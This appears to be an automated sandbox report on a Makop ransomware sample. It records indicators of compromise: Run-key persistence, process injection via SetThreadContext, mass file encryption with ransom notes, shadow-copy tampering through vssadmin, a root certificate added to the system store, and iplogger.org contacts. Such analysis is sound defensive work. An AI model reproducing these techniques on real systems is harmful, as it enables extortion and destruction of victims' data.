N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\MAKOP_27_10_2020_115KB.exe\"" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2080 set thread context of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1800 set thread context of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 set thread context of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 set thread context of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 set thread context of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 set thread context of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 set thread context of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 set thread context of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 set thread context of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 set thread context of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1392 set thread context of 2224 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 3028 set thread context of 2988 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1504 set thread context of 1808 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1732 set thread context of 2616 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2324 set thread context of 1960 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1744 set thread context of 2200 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1860 set thread context of 2188 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 3040 set thread context of 2532 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1196 set thread context of 2368 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1680 set thread context of 980 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1840 set thread context of 2388 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2040 set thread context of 2152 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1104 set thread context of 2724 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 3064 set thread context of 1496 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1052 set thread context of 1632 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2604 set thread context of 2488 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2720 set thread context of 1628 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2980 set thread context of 2120 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 236 set thread context of 2672 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1476 set thread context of 1616 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 876 set thread context of 1620 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2256 set thread context of 2792 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 888 set thread context of 2164 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1136 set thread context of 1688 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2088 set thread context of 2364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 912 set thread context of 1696 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2576 set thread context of 2744 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 280 set thread context of 388 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 588 set thread context of 1592 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 536 set thread context of 2212 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2508 set thread context of 2564 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1676 set thread context of 1768 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 224 set thread context of 2068 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 948 set thread context of 1152 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 216 set thread context of 2552 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1644 set thread context of 900 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1352 set thread context of 396 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1812 set thread context of 2284 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1280 set thread context of 756 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2876 set thread context of 2640 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 808 set thread context of 2880 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2296 set thread context of 2132 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1548 set thread context of 2412 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2676 set thread context of 1964 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0286034.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\settings.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msaddsr.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03236_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\readme-warning.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105294.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02845G.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\readme-warning.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTS.ICO C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALSO11.POC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\ACT3R.SAM C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\readme-warning.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\BLENDS.INF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199475.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293234.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\settings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\sonicsptransform.ax C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer.[76AC78C0].[[email protected]].makop C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENVHM.POC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_COL.HXC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00798_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0300912.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSO.ACL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\VelvetRose.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_pressed.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
